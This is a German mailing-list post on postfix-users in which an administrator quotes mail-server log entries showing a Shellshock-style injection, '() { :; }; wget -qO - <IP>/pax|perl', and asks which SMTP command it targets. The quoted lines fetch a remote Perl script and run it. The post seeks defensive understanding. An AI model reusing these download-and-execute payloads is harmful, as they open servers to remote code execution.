Frage zu Illegal address syntax Attacke

Joerg Hartmann joerg at h0815.de
So Jun 4 20:39:49 CEST 2023


Hallo,

in letzter Zeit habe ich häufiger Logeinträge der folgenden Form:

May 28 15:57:04 www postfix/smtpd[7094]: warning: Illegal address syntax 
from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; 
wget -qO - 136.243.150.82/das|perl>
May 31 06:40:12 www postfix/smtpd[7307]: warning: Illegal address syntax 
from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; 
wget -qO - 68.235.39.225/pax|perl>
Jun  1 14:51:50 www postfix/smtpd[18260]: warning: Illegal address 
syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; 
}; wget -qO - 68.235.39.225/pax|perl>
Jun  1 21:06:28 www postfix/smtpd[20438]: warning: Illegal address 
syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; 
}; wget -qO - 68.235.39.225/ipax|perl>
Jun  2 15:43:35 www postfix/smtpd[25713]: warning: Illegal address 
syntax from unknown[104.200.146.36] in MAIL command: <() { :; }; wget 
-qO - 68.235.39.225/ipax|perl>

Offensichtlich ist dies eine Art "SMTP-Injection" Attacke, bei der eine 
lokale Shell gestartet werden soll um per wget eine Datei zu holen, die 
zu perl gepiped wird.  Das per wget abzuholende File ist ein Perl-Script 
von ca. 20KByte Größe mit "unfreundlichem" Inhalt.

Ich kann jedoch nicht erkennen, welche Stelle des "SMTP-Dialogs" hier 
angegriffen wird. "Illegal address" deutet (für mich) eher auf die FROM 
oder RECIPT TO Kommandos hin. Kann jemand das besser erläutern?
Danke!

Grüße
Jörg


Mehr Informationen über die Mailingliste postfix-users